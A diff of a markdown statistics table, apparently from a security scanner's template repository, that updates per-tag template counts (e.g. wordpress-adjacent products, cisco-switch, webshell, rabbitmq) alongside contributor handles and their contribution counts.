| | | | | -| photo | 4 | willd96 | 1 | | | | | | | -| kingsoft | 4 | mukundbhuva | 1 | | | | | | | -| sound4 | 4 | chron0x | 1 | | | | | | | -| audiocodes | 4 | jaskaran | 1 | | | | | | | -| dropbear | 4 | vzamanillo | 1 | | | | | | | -| mostracms | 4 | jiheon-dev | 1 | | | | | | | -| postmessage | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| rabbitmq | 4 | intx0x80 | 1 | | | | | | | -| datadog | 4 | win3zz | 1 | | | | | | | -| osint-archived | 4 | elder tao | 1 | | | | | | | -| seagate | 4 | danigoland | 1 | | | | | | | -| metersphere | 4 | nuts7 | 1 | | | | | | | -| mautic | 4 | dawid-czarnecki | 1 | | | | | | | -| auieo | 4 | kresec | 1 | | | | | | | -| flickr | 4 | nagli | 1 | | | | | | | -| gnuboard | 4 | ahmed sherif | 1 | | | | | | | -| wcs | 4 | pussycat0 | 1 | | | | | | | -| confluent | 4 | opencirt | 1 | | | | | | | -| figma | 4 | kabirsuda | 1 | | | | | | | -| purchase_order_management_system_project | 4 | retr02332 | 1 | | | | | | | -| pentaho | 4 | fur1na | 1 | | | | | | | -| mostra | 4 | exid | 1 | | | | | | | -| cnvd2022 | 4 | jeya seelan | 1 | | | | | | | -| kibana | 4 | patralos | 1 | | | | | | | -| info | 4 | nytr0gen | 1 | | | | | | | -| rocketchat | 4 | mariam tariq | 1 | | | | | | | -| dotnet | 4 | bartu utku sarp | 1 | | | | | | | -| jfrog | 4 | hexcat | 1 | | | | | | | -| nextjs | 4 | bywalks | 1 | | | | | | | -| finicity | 4 | andysvints | 1 | | | | | | | -| artifactory | 4 | pudsec | 1 | | | | | | | -| phpjabber | 4 | d4ly | 1 | | | | | | | -| sendgrid | 4 | omarjezi | 1 | | | | | | | -| pie-register | 4 | co0nan | 1 | | | | | | | -| pluginus | 4 | ldionmarcil | 1 | | | | | | | -| eclipse | 4 | f0xy | 1 | | | | | | | -| wireguard | 4 | naglis | 1 | | | | | | | -| owncloud | 4 | null_hypothesis | 1 | | | | | | | -| salesforce | 4 | bad5ect0r | 1 | | | | | | | -| webmail | 4 | r3nz0 | 1 | | | | | | | -| wp-statistics | 4 | yusakie | 1 | | | | | | | -| veronalabs | 4 | bjxsec | 1 | | | | | | | -| centos | 4 | sospiro | 1 | | | | | | | -| cnvd2019 | 4 | mhdsamx | 1 | | | | | | | -| fit2cloud | 4 | puben | 1 | | | | | | | -| saltstack | 3 | numan türle | 1 | | | | | | | -| nc | 3 | dali | 1 | | | | | | | -| cluster | 3 | rschio | 1 | | | | | | | -| sqlite | 3 | hakluke | 1 | | | | | | | -| newsletter | 3 | 0xprial | 1 | | | | | | | -| dubbo | 3 | shiar | 1 | | | | | | | -| purchase-order | 3 | furkansayim | 1 | | | | | | | -| nortek | 3 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| petya | 3 | marcio mendes | 1 | | | | | | | -| intercom | 3 | dk999 | 1 | | | | | | | -| trixbox | 3 | qianbenhyu | 1 | | | | | | | -| axis | 3 | colbyjack1134 | 1 | | | | | | | -| wwbn | 3 | shiva (strobes security) | 1 | | | | | | | -| revive | 3 | kiransau | 1 | | | | | | | -| lighttpd | 3 | yiran | 1 | | | | | | | -| phpipam | 3 | xcapri | 1 | | | | | | | -| siemens | 3 | akshansh | 1 | | | | | | | -| hsphere | 3 | wlayzz | 1 | | | | | | | -| processwire | 3 | fmunozs | 1 | | | | | | | -| flexvnf | 3 | sherlocksecurity | 1 | | | | | | | -| xxljob | 3 | akokonunes | 1 | | | | | | | -| fastly | 3 | michael wedl | 1 | | | | | | | -| diagrams | 3 | jfbes | 1 | | | | | | | -| automattic | 3 | anon-artist | 1 | | | | | | | -| ansible | 3 | notwhy | 1 | | | | | | | -| fanruan | 3 | miguelsegoviagil | 1 | | | | | | | -| samba | 3 | jbaines-r7 | 1 | | | | | | | -| purchase-order-management-system | 3 | narluin | 1 | | | | | | | -| rpm | 3 | yuansec | 1 | | | | | | | -| csrf | 3 | unkl4b | 1 | | | | | | | -| softwarepublico | 3 | amnotacat | 1 | | | | | | | -| netlify | 3 | bjhulst | 1 | | | | | | | -| eyoucms | 3 | realexp3rt | 1 | | | | | | | -| ninjaforms | 3 | iphantasmic | 1 | | | | | | | -| clientid | 3 | rodnt | 1 | | | | | | | -| bitrix24 | 3 | carrot2 | 1 | | | | | | | -| soplanning | 3 | juliosmelo | 1 | | | | | | | -| movable | 3 | davidfegyver | 1 | | | | | | | -| influxdb | 3 | ola456 | 1 | | | | | | | -| inspur | 3 | francescocarlucci | 1 | | | | | | | -| finecms | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| vercel | 3 | fq_hsu | 1 | | | | | | | -| netdata | 3 | xshuden | 1 | | | | | | | -| strangerstudios | 3 | denandz | 1 | | | | | | | -| contribsys | 3 | juicypotato1 | 1 | | | | | | | -| sidekiq | 3 | aron molnar | 1 | | | | | | | -| sharepoint | 3 | ndmalc | 1 | | | | | | | -| ixcache | 3 | manuelbua | 1 | | | | | | | -| backdropcms | 3 | majidmc2 | 1 | | | | | | | -| loytec | 3 | evolutionsec | 1 | | | | | | | -| fuelcms | 3 | kiks7 | 1 | | | | | | | -| openam | 3 | 0xcharan | 1 | | | | | | | -| rstudio | 3 | stupidfish | 1 | | | | | | | -| thefactory | 3 | kba@sogeti_esec | 1 | | | | | | | -| aptus | 3 | 0xh7ml | 1 | | | | | | | -| actuator | 3 | omarkurt | 1 | | | | | | | -| sharefile | 3 | arr0way | 1 | | | | | | | -| kavita | 3 | william söderberg @ withsecure | 1 | | | | | | | -| apple | 3 | barthy.koeln | 1 | | | | | | | -| tplus | 3 | piyushchhiroliya | 1 | | | | | | | -| e-cology | 3 | infosecsanyam | 1 | | | | | | | -| cpanel | 3 | sak1 | 1 | | | | | | | -| payara | 3 | sdcampbell | 1 | | | | | | | -| ampps | 3 | hardik-rathod | 1 | | | | | | | -| webkul-qloapps | 3 | cbadke | 1 | | | | | | | -| nifi | 3 | nobody | 1 | | | | | | | -| webalizer | 3 | cravaterouge | 1 | | | | | | | -| emqx | 3 | 0xteles | 1 | | | | | | | -| glassfish | 3 | eremit4 | 1 | | | | | | | -| pulsar | 3 | sickwell | 1 | | | | | | | -| dokuwiki | 3 | phillipo | 1 | | | | | | | -| shell | 3 | mah3sec_ | 1 | | | | | | | -| favicon | 3 | alexrydzak | 1 | | | | | | | -| unifi | 3 | ringo | 1 | | | | | | | -| xerox | 3 | allenwest24 | 1 | | | | | | | -| dvr | 3 | therealtoastycat | 1 | | | | | | | -| mailgun | 3 | daffianfo | 1 | | | | | | | -| std42 | 3 | zsusac | 1 | | | | | | | -| ghost | 3 | pratik khalane | 1 | | | | | | | -| modoboa | 3 | daviey | 1 | | | | | | | -| h2o | 3 | yashgoti | 1 | | | | | | | -| getsimple | 3 | tirtha_mandal | 1 | | | | | | | -| joomlacomponent.inetlanka | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| webadmin | 3 | pascalheidmann | 1 | | | | | | | -| qlik | 3 | olewagner | 1 | | | | | | | -| kfm | 3 | pphuahua | 1 | | | | | | | -| opencart | 3 | ramkrishna sawant | 1 | | | | | | | -| forum | 3 | borna nematzadeh | 1 | | | | | | | -| r-seenet | 3 | blckraven | 1 | | | | | | | -| afterlogic | 3 | 0xceeb | 1 | | | | | | | -| ithemes | 3 | spac3wh1te | 1 | | | | | | | -| particle | 3 | djoevanka | 1 | | | | | | | -| webtareas_project | 3 | ofjaaah | 1 | | | | | | | -| watchguard | 3 | elmahdi | 1 | | | | | | | -| pypi | 3 | axrk | 1 | | | | | | | -| discourse | 3 | ooooooo_q | 1 | | | | | | | -| dreambox | 3 | thirukrishnan | 1 | | | | | | | -| casdoor | 3 | ramondunker | 1 | | | | | | | -| western_digital | 3 | lixts | 1 | | | | | | | -| avada | 3 | ph33rr | 1 | | | | | | | -| 3cx | 3 | th3r4id | 1 | | | | | | | -| spip | 3 | topscoder | 1 | | | | | | | -| superset | 3 | makyotox | 1 | | | | | | | -| zendesk | 3 | berkdusunur | 1 | | | | | | | -| proftpd | 3 | izn0u | 1 | | | | | | | -| complete_online_job_search_system_project | 3 | schniggie | 1 | | | | | | | -| teampass | 3 | ok_bye_now | 1 | | | | | | | -| reddit | 3 | geraldino2 | 1 | | | | | | | -| default | 3 | micha3lb3n | 1 | | | | | | | -| zeroshell | 3 | couskito | 1 | | | | | | | -| gvectors | 3 | amanrawat | 1 | | | | | | | -| clusterengine | 3 | matthew nickerson (b0than) @ | 1 | | | | | | | +| cisco-switch | 8 | luci | 2 | | | | | | | +| spotweb | 8 | thabisocn | 2 | | | | | | | +| spotweb_project | 8 | geekby | 2 | | | | | | | +| console | 8 | arliya | 2 | | | | | | | +| error | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| emerge | 8 | nvn1729 | 2 | | | | | | | +| osint-news | 8 | n-thumann | 2 | | | | | | | +| default-page | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| go | 8 | g4l1t0 | 2 | | | | | | | +| unauthenticated | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| odoo | 8 | myztique | 2 | | | | | | | +| atom | 8 | 6mile | 2 | | | | | | | +| monstra | 7 | k11h-de | 2 | | | | | | | +| database | 7 | dbrwsky | 2 | | | | | | | +| avtech | 7 | zy9ard3 | 2 | | | | | | | +| mongodb | 7 | uomogrande | 2 | | | | | | | +| nagiosxi | 7 | serrapa | 2 | | | | | | | +| keking | 7 | dogancanbakir | 2 | | | | | | | +| telesquare | 7 | sy3omda | 2 | | | | | | | +| moodating | 7 | vavkamil | 2 | | | | | | | +| landray | 7 | raesene | 2 | | | | | | | +| joomla\! | 7 | borna nematzadeh | 1 | | | | | | | +| mobileiron | 7 | invisiblethreat | 1 | | | | | | | +| twitter | 7 | cravaterouge | 1 | | | | | | | +| openemr | 7 | lrtk-coder | 1 | | | | | | | +| nortekcontrol | 7 | matthew nickerson (b0than) @ | 1 | | | | | | | | | | layer 8 security | | | | | | | | -| imap | 3 | y0no | 1 | | | | | | | -| qts | 3 | vikas kundu | 1 | | | | | | | -| learndash | 3 | 8authur | 1 | | | | | | | -| idrac | 3 | kagamigawa | 1 | | | | | | | -| httpbin | 3 | s1r1us | 1 | | | | | | | -| grp | 3 | wabafet | 1 | | | | | | | -| nuxtjs | 3 | open-sec | 1 | | | | | | | -| backdrop | 3 | mayank_pandey01 | 1 | | | | | | | -| jitsi | 3 | palanichamy_perumal | 1 | | | | | | | -| poms | 3 | unp4ck | 1 | | | | | | | -| supsystic | 3 | jc175 | 1 | | | | | | | -| key | 3 | egemenkochisarli | 1 | | | | | | | -| instagram | 3 | revblock | 1 | | | | | | | -| wordfence | 3 | toufik-airane | 1 | | | | | | | -| mongo | 3 | fpatrik | 1 | | | | | | | -| apollo | 3 | bibeksapkota (sar00n) | 1 | | | | | | | -| tableau | 3 | sicksec | 1 | | | | | | | -| cybelesoft | 3 | high | 1 | | | | | | | -| evlink | 3 | mabdullah22 | 1 | | | | | | | -| yzmcms | 3 | mrcl0wnlab | 1 | | | | | | | -| weiphp | 3 | k3rwin | 1 | | | | | | | -| magnolia | 3 | xc1ym | 1 | | | | | | | -| spotify | 3 | ransomsec | 1 | | | | | | | -| airtable | 3 | hyunsoo-ds | 1 | | | | | | | -| gradle | 3 | shelld3v | 1 | | | | | | | -| drawio | 3 | savik | 1 | | | | | | | -| rubygems | 3 | becivells | 1 | | | | | | | -| listserv | 3 | erikowen | 1 | | | | | | | -| tautulli | 3 | secthebit | 1 | | | | | | | -| school_dormitory_management_system_project | 3 | sshell | 1 | | | | | | | -| chatgpt | 3 | jacalynli | 1 | | | | | | | -| fileman | 3 | httpvoid | 1 | | | | | | | -| circleci | 3 | sinsinology | 1 | | | | | | | -| modem | 3 | nerrorsec | 1 | | | | | | | -| thinfinity | 3 | floriandewald | 1 | | | | | | | -| webtareas | 3 | gpiechnik2 | 1 | | | | | | | -| cloudwatch | 3 | orpheus | 1 | | | | | | | -| osticket | 3 | alevsk | 1 | | | | | | | -| subrion | 3 | screamy | 1 | | | | | | | -| dev.pucit.edu.pk | 3 | whotwagner | 1 | | | | | | | -| bigant | 3 | byobin | 1 | | | | | | | -| adiscon | 3 | west-wise | 1 | | | | | | | -| jeesns | 3 | mbmy | 1 | | | | | | | -| mooveagency | 3 | 0xrod | 1 | | | | | | | -| carel | 3 | mass0ma | 1 | | | | | | | -| empirecms | 3 | mantissts | 1 | | | | | | | -| trendnet | 3 | _darrenmartyn | 1 | | | | | | | -| buffalo | 3 | yavolo | 1 | | | | | | | -| selea | 3 | remonsec | 1 | | | | | | | -| lansweeper | 3 | | | | | | | | | -| limesurvey | 3 | | | | | | | | | -| rancher | 3 | | | | | | | | | -| etcd | 3 | | | | | | | | | -| sitemap | 3 | | | | | | | | | -| switch | 3 | | | | | | | | | -| etsy | 3 | | | | | | | | | -| mythic | 3 | | | | | | | | | -| webnus | 3 | | | | | | | | | -| lotus | 3 | | | | | | | | | -| piwigo | 3 | | | | | | | | | -| revive-adserver | 3 | | | | | | | | | -| i3geo | 3 | | | | | | | | | -| monitor | 3 | | | | | | | | | -| mapbox | 3 | | | | | | | | | -| thruk | 3 | | | | | | | | | -| dotcms | 3 | | | | | | | | | -| segment | 3 | | | | | | | | | -| draytek | 3 | | | | | | | | | -| cas | 3 | | | | | | | | | -| zeit | 3 | | | | | | | | | -| steve | 3 | | | | | | | | | -| netfortris | 3 | | | | | | | | | -| graph | 3 | | | | | | | | | -| targa | 3 | | | | | | | | | -| e-mobile | 3 | | | | | | | | | -| messaging | 3 | | | | | | | | | -| yii | 3 | | | | | | | | | -| digitalrebar | 3 | | | | | | | | | -| aruba | 3 | | | | | | | | | -| ad | 3 | | | | | | | | | -| waf | 3 | | | | | | | | | -| esafenet | 3 | | | | | | | | | -| postman | 3 | | | | | | | | | -| netflix | 3 | | | | | | | | | -| flutter | 3 | | | | | | | | | -| woodwing | 3 | | | | | | | | | -| pandorafms | 3 | | | | | | | | | -| contentful | 3 | | | | | | | | | -| octobercms | 3 | | | | | | | | | -| superadmin | 3 | | | | | | | | | +| instrusive | 7 | olewagner | 1 | | | | | | | +| rfi | 7 | youngpope | 1 | | | | | | | +| car_rental_management_system_project | 7 | zinminphy0 | 1 | | | | | | | +| slack | 7 | hlop | 1 | | | | | | | +| vpc | 7 | 0h1in9e | 1 | | | | | | | +| filemanager | 7 | kareemse1im | 1 | | | | | | | +| activemq | 7 | tehtbl | 1 | | | | | | | +| ruckus | 7 | aresx | 1 | | | | | | | +| opensis | 7 | 8authur | 1 | | | | | | | +| solarwinds | 7 | kiransau | 1 | | | | | | | +| maps | 7 | bugvsme | 1 | | | | | | | +| gogs | 7 | knassar702 | 1 | | | | | | | +| shopify | 7 | pepitoh | 1 | | | | | | | +| fortios | 7 | _harleo | 1 | | | | | | | +| blockchain | 7 | soyelmago | 1 | | | | | | | +| contec | 7 | x6263 | 1 | | | | | | | +| cacti | 7 | k3rwin | 1 | | | | | | | +| exploitdb | 7 | jna1 | 1 | | | | | | | +| websphere | 7 | zhenwarx | 1 | | | | | | | +| f5 | 7 | hakluke | 1 | | | | | | | +| linkedin | 7 | nielsing | 1 | | | | | | | +| bigip | 7 | ooooooo_q | 1 | | | | | | | +| teamcity | 7 | co0nan | 1 | | | | | | | +| vms | 7 | iampritam | 1 | | | | | | | +| squirrelmail | 7 | yaser_s | 1 | | | | | | | +| nacos | 7 | 0xcharan | 1 | | | | | | | +| bloofox | 7 | am0nt31r0 | 1 | | | | | | | +| oos | 7 | hazana | 1 | | | | | | | +| fpd | 7 | chetgan | 1 | | | | | | | +| pmb | 7 | domenicoveneziano | 1 | | | | | | | +| liferay | 6 | opencirt | 1 | | | | | | | +| servicenow | 6 | stupidfish | 1 | | | | | | | +| doctor-appointment-system | 6 | luqmaan hadia | 1 | | | | | | | +| cobbler | 6 | andirrahmani1 | 1 | | | | | | | +| bmc | 6 | s1r1u5_ | 1 | | | | | | | +| webmin | 6 | lamscun | 1 | | | | | | | +| flutterwave | 6 | zn9988 | 1 | | | | | | | +| vrealize | 6 | justmumu | 1 | | | | | | | +| cockpit | 6 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| express | 6 | kagamigawa | 1 | | | | | | | +| rat | 6 | topscoder | 1 | | | | | | | +| plesk | 6 | infosecsanyam | 1 | | | | | | | +| gcp | 6 | djoevanka | 1 | | | | | | | +| geoserver | 6 | kiks7 | 1 | | | | | | | +| magmi | 6 | imhunterand | 1 | | | | | | | +| beyondtrust | 6 | mesaglio | 1 | | | | | | | +| chanjet | 6 | dorkerdevil | 1 | | | | | | | +| splunk | 6 | ruppde | 1 | | | | | | | +| lfprojects | 6 | dali | 1 | | | | | | | +| 74cms | 6 | millermedia | 1 | | | | | | | +| kubelet | 6 | _darrenmartyn | 1 | | | | | | | +| microstrategy | 6 | ola456 | 1 | | | | | | | +| asp | 6 | mariam tariq | 1 | | | | | | | +| paypal | 6 | evan rubinstien | 1 | | | | | | | +| jetty | 6 | 0xparth | 1 | | | | | | | +| advantech | 6 | mantissts | 1 | | | | | | | +| jamf | 6 | mlec | 1 | | | | | | | +| keycloak | 6 | carson chan | 1 | | | | | | | +| ldap | 6 | th3r4id | 1 | | | | | | | +| tikiwiki | 6 | pjborah | 1 | | | | | | | +| jeecg | 6 | diablo | 1 | | | | | | | +| sql | 6 | gboddin | 1 | | | | | | | +| elfinder | 6 | f0xy | 1 | | | | | | | +| log | 6 | ling | 1 | | | | | | | +| openvpn | 6 | igibanez | 1 | | | | | | | +| doctor_appointment_system_project | 6 | h4sh5 | 1 | | | | | | | +| typo3 | 6 | denandz | 1 | | | | | | | +| server | 6 | ndmalc | 1 | | | | | | | +| synacor | 6 | tim_koopmans | 1 | | | | | | | +| leak | 6 | luqman | 1 | | | | | | | +| asus | 6 | puben | 1 | | | | | | | +| sonarqube | 6 | d0rkerdevil | 1 | | | | | | | +| couchdb | 6 | remi gascou (podalirius) | 1 | | | | | | | +| zhiyuan | 6 | barthy.koeln | 1 | | | | | | | +| minio | 6 | retr02332 | 1 | | | | | | | +| swagger | 5 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| magmi_project | 5 | elouhi | 1 | | | | | | | +| circarlife | 5 | revblock | 1 | | | | | | | +| kkfileview | 5 | un-fmunozs | 1 | | | | | | | +| connectwise | 5 | team syslifters / christoph | 1 | | | | | | | +| | | mahrl | | | | | | | | +| resin | 5 | vinit989 | 1 | | | | | | | +| cve2007 | 5 | mammad_rahimzada | 1 | | | | | | | +| metinfo | 5 | sttlr | 1 | | | | | | | +| cdata | 5 | christbowel | 1 | | | | | | | +| graylog | 5 | sec_hawk | 1 | | | | | | | +| cnvd2023 | 5 | omarjezi | 1 | | | | | | | +| terramaster | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | +| genetechsolutions | 5 | jrolf | 1 | | | | | | | +| awstats | 5 | hardik-rathod | 1 | | | | | | | +| acm | 5 | nobody | 1 | | | | | | | +| rseenet | 5 | toufik-airane | 1 | | | | | | | +| ethereum | 5 | axrk | 1 | | | | | | | +| totolink | 5 | phillipo | 1 | | | | | | | +| axigen | 5 | xcapri | 1 | | | | | | | +| fatpipe | 5 | kabirsuda | 1 | | | | | | | +| tibco | 5 | xshuden | 1 | | | | | | | +| adminer | 5 | spac3wh1te | 1 | | | | | | | +| hpe | 5 | pphuahua | 1 | | | | | | | +| apisix | 5 | r3nz0 | 1 | | | | | | | +| matrix | 5 | y0no | 1 | | | | | | | +| openai | 5 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| mssql | 5 | mhdsamx | 1 | | | | | | | +| openfire | 5 | shelld3v | 1 | | | | | | | +| zzzcms | 5 | irshadahamed | 1 | | | | | | | +| openstack | 5 | sorrowx3 | 1 | | | | | | | +| sftp | 5 | alperenkesk | 1 | | | | | | | +| avaya | 5 | pussycat0 | 1 | | | | | | | +| decision-center | 5 | amirmsafari | 1 | | | | | | | +| agentejo | 5 | husain | 1 | | | | | | | +| chamilo | 5 | cbadke | 1 | | | | | | | +| jabber | 5 | w8ay | 1 | | | | | | | +| storage | 5 | jeya.seelan | 1 | | | | | | | +| strapi | 5 | tangxiaofeng7 | 1 | | | | | | | +| firmware | 5 | kresec | 1 | | | | | | | +| akamai | 5 | skylark-lab | 1 | | | | | | | +| dionaea | 5 | remonsec | 1 | | | | | | | +| cloudflare | 5 | xeldax | 1 | | | | | | | +| qdpm | 5 | wabafet | 1 | | | | | | | +| jwt | 5 | prettyboyaaditya | 1 | | | | | | | +| nuuo | 5 | bibeksapkota (sar00n) | 1 | | | | | | | +| square | 5 | hateshape | 1 | | | | | | | +| glpi-project | 5 | aayush vishnoi | 1 | | | | | | | +| circontrol | 5 | iphantasmic | 1 | | | | | | | +| adb | 5 | osamahamad | 1 | | | | | | | +| carrental | 5 | davidfegyver | 1 | | | | | | | +| pyload | 5 | aaban solutions | 1 | | | | | | | +| mikrotik | 5 | professorabhay | 1 | | | | | | | +| gocd | 5 | zsusac | 1 | | | | | | | +| sentry | 5 | r3s ost | 1 | | | | | | | +| jupyter | 5 | juicypotato1 | 1 | | | | | | | +| wbce | 5 | sdcampbell | 1 | | | | | | | +| asana | 5 | becivells | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | m0ck3d | 1 | | | | | | | +| crushftp | 5 | babybash | 1 | | | | | | | +| redmine | 5 | elitebaz | 1 | | | | | | | +| open-emr | 5 | floriandewald | 1 | | | | | | | +| papercut | 5 | mah3sec_ | 1 | | | | | | | +| goanywhere | 5 | rotembar | 1 | | | | | | | +| react | 5 | erethon | 1 | | | | | | | +| qnap | 5 | rivalsec | 1 | | | | | | | +| froxlor | 5 | numan türle | 1 | | | | | | | +| hybris | 5 | couskito | 1 | | | | | | | +| ems | 5 | francescocarlucci | 1 | | | | | | | +| paloaltonetworks | 5 | d4ly | 1 | | | | | | | +| percha | 5 | lixts | 1 | | | | | | | +| voip | 5 | lingtren | 1 | | | | | | | +| hoteldruid | 5 | chesterblue | 1 | | | | | | | +| webview | 5 | allenwest24 | 1 | | | | | | | +| parallels | 5 | daffianfo | 1 | | | | | | | +| sysaid | 5 | tirtha | 1 | | | | | | | +| schneider-electric | 5 | omarkurt | 1 | | | | | | | +| caucho | 5 | noobexploiter | 1 | | | | | | | +| thedigitalcraft | 5 | brabbit10 | 1 | | | | | | | +| xmlrpc | 5 | shivampand3y | 1 | | | | | | | +| 10web | 5 | fur1na | 1 | | | | | | | +| tenda | 5 | aceseven (digisec360) | 1 | | | | | | | +| avideo | 5 | rschio | 1 | | | | | | | +| craftcms | 5 | banana69 | 1 | | | | | | | +| elementor | 5 | rubina119 | 1 | | | | | | | +| web3 | 5 | marcio mendes | 1 | | | | | | | +| igniterealtime | 4 | yashgoti | 1 | | | | | | | +| moveit | 4 | willd96 | 1 | | | | | | | +| dom | 4 | ph33rr | 1 | | | | | | | +| auieo | 4 | ipanda | 1 | | | | | | | +| digitaldruid | 4 | deena | 1 | | | | | | | +| harbor | 4 | high | 1 | | | | | | | +| panos | 4 | regala_ | 1 | | | | | | | +| mostracms | 4 | gpiechnik2 | 1 | | | | | | | +| jorani | 4 | _c0wb0y_ | 1 | | | | | | | +| hongfan | 4 | adrianmf | 1 | | | | | | | +| tiki | 4 | zandros0 | 1 | | | | | | | +| salesforce | 4 | mihhailsokolov | 1 | | | | | | | +| kingsoft | 4 | elder tao | 1 | | | | | | | +| env | 4 | 0xtavian | 1 | | | | | | | +| wireguard | 4 | ky9oss | 1 | | | | | | | +| bitrix | 4 | jiheon-dev | 1 | | | | | | | +| imgproxy | 4 | archer | 1 | | | | | | | +| opencms | 4 | mohammad reza omrani | | 1 | | | | | | | +| | | @omranisecurity | | | | | | | | +| mostra | 4 | ptonewreckin | 1 | | | | | | | +| concrete | 4 | qianbenhyu | 1 | | | | | | | +| pie-register | 4 | anon-artist | 1 | | | | | | | +| sound4 | 4 | fq_hsu | 1 | | | | | | | +| joomlamo | 4 | mass0ma | 1 | | | | | | | +| cnvd2019 | 4 | whynotke | 1 | | | | | | | +| confluent | 4 | yuansec | 1 | | | | | | | +| easypost | 4 | unknown | 1 | | | | | | | +| wcs | 4 | none | 1 | | | | | | | +| terra-master | 4 | jteles | 1 | | | | | | | +| metabase | 4 | shiva (strobes security) | 1 | | | | | | | +| umbraco | 4 | drfabiocastro | 1 | | | | | | | +| springcloud | 4 | danfaizer | 1 | | | | | | | +| kibana | 4 | sak1 | 1 | | | | | | | +| ray | 4 | notsoevilweasel | 1 | | | | | | | +| mitel | 4 | failopen | 1 | | | | | | | +| pluginus | 4 | abbas.heybati | 1 | | | | | | | +| telegram | 4 | shockwave | 1 | | | | | | | +| candidats | 4 | bjhulst | 1 | | | | | | | +| httpserver | 4 | yavolo | 1 | | | | | | | +| ghost | 4 | vzamanillo | 1 | | | | | | | +| aria | 4 | ynnirc | 1 | | | | | | | +| pip | 4 | freakyclown | 1 | | | | | | | +| kyocera | 4 | affix | 1 | | | | | | | +| photo | 4 | dawid-czarnecki | 1 | | | | | | | +| sendgrid | 4 | bughuntersurya | 1 | | | | | | | +| roxy | 4 | juliosmelo | 1 | | | | | | | +| os4ed | 4 | shivanshkhari | 1 | | | | | | | +| bamboo | 4 | droberson | 1 | | | | | | | +| rabbitmq | 4 | chron0x | 1 | | | | | | | +| kentico | 4 | samuelsamuelsamuel | 1 | | | | | | | +| datadog | 4 | hakimkt | 1 | | | | | | | +| newstatpress | 4 | naglis | 1 | | | | | | | +| finicity | 4 | hyunsoo-ds | 1 | | | | | | | +| purchase_order_management_system_project | 4 | omranisecurity | 1 | | | | | | | +| panabit | 4 | mr.bobo hp | 1 | | | | | | | +| flickr | 4 | 1nf1n7y | 1 | | | | | | | +| http | 4 | hotpot | 1 | | | | | | | +| jellyfin | 4 | manasmbellani | 1 | | | | | | | +| hongdian | 4 | rotemreiss | 1 | | | | | | | +| spark | 4 | carrot2 | 1 | | | | | | | +| aura | 4 | mayank_pandey01 | 1 | | | | | | | +| cnvd2022 | 4 | lbb | 1 | | | | | | | +| zte | 4 | josecosta | 1 | | | | | | | +| artifactory | 4 | blckraven | 1 | | | | | | | +| codeigniter | 4 | ransomsec | 1 | | | | | | | +| articatech | 4 | flag007 | 1 | | | | | | | +| mailchimp | 4 | savik | 1 | | | | | | | +| arcgis | 4 | luciannitescu | 1 | | | | | | | +| webshell | 4 | b4uh0lz | 1 | | | | | | | +| casaos | 4 | carlosvieira | 1 | | | | | | | +| zend | 4 | ramondunker | 1 | | | | | | | +| juniper | 4 | dmartyn | 1 | | | | | | | +| audiocodes | 4 | aringo-bf | 1 | | | | | | | +| ampache | 4 | push4d | 1 | | | | | | | +| age-encryption | 4 | alex | 1 | | | | | | | +| linuxfoundation | 4 | nagli | 1 | | | | | | | +| jfrog | 4 | apt-mirror | 1 | | | | | | | +| seagate | 4 | 0ut0fb4nd | 1 | | | | | | | +| webmail | 4 | rumble773 | 1 | | | | | | | +| jsf | 4 | amir-h-fallahi | 1 | | | | | | | +| pixie | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| harmistechnology | 4 | elmahdi | 1 | | | | | | | +| yeswiki | 4 | petruknisme | 1 | | | | | | | +| angular | 4 | fmunozs | 1 | | | | | | | +| ebs | 4 | null_hypothesis | 1 | | | | | | | +| gnuboard | 4 | aaronchen0 | 1 | | | | | | | +| intelbras | 4 | h4kux | 1 | | | | | | | +| postmessage | 4 | aron molnar | 1 | | | | | | | +| djangoproject | 4 | pudsec | 1 | | | | | | | +| puppet | 4 | 0xkayala | 1 | | | | | | | +| search | 4 | byobin | 1 | | | | | | | +| httpd | 4 | ldionmarcil | 1 | | | | | | | +| dahuasecurity | 4 | udyz | 1 | | | | | | | +| dolibarr | 4 | guax1 | 1 | | | | | | | +| mcafee | 4 | calumjelrick | 1 | | | | | | | +| consul | 4 | 5up3r541y4n | 1 | | | | | | | +| nextjs | 4 | undefl0w | 1 | | | | | | | +| checkpoint | 4 | houdinis | 1 | | | | | | | +| newstatpress_project | 4 | william söderberg @ withsecure | 1 | | | | | | | +| eclipse | 4 | joaonevess | 1 | | | | | | | +| sugarcrm | 4 | ayadi | 1 | | | | | | | +| mantisbt | 4 | watchtowr | 1 | | | | | | | +| pega | 4 | f1she3 | 1 | | | | | | | +| reprisesoftware | 4 | exploitation | 1 | | | | | | | +| pentaho | 4 | jc175 | 1 | | | | | | | +| d-link | 4 | qlkwej | 1 | | | | | | | +| metersphere | 4 | act1on3 | 1 | | | | | | | +| veronalabs | 4 | lady_bug | 1 | | | | | | | +| prtg | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| phppgadmin | 4 | ofjaaah | 1 | | | | | | | +| bittrex | 4 | kba@sogeti_esec | 1 | | | | | | | +| metasploit | 4 | absshax | 1 | | | | | | | +| osint-archived | 4 | w0tx | 1 | | | | | | | +| phpjabber | 4 | yusakie | 1 | | | | | | | +| creativeitem | 4 | secthebit | 1 | | | | | | | +| kevinlab | 4 | petergrifin | 1 | | | | | | | +| shiro | 4 | arall | 1 | | | | | | | +| linksys | 4 | ahmed sherif | 1 | | | | | | | +| wpdevart | 4 | retr0 | 1 | | | | | | | +| okta | 4 | akash.c | 1 | | | | | | | +| flink | 4 | adilsoybali | 1 | | | | | | | +| grav | 4 | liquidsec | 1 | | | | | | | +| password | 4 | udinchan | 1 | | | | | | | +| centos | 4 | s1r1us | 1 | | | | | | | +| learnpress | 4 | west-wise | 1 | | | | | | | +| powerjob | 4 | sickwell | 1 | | | | | | | +| nosqli | 4 | natto97 | 1 | | | | 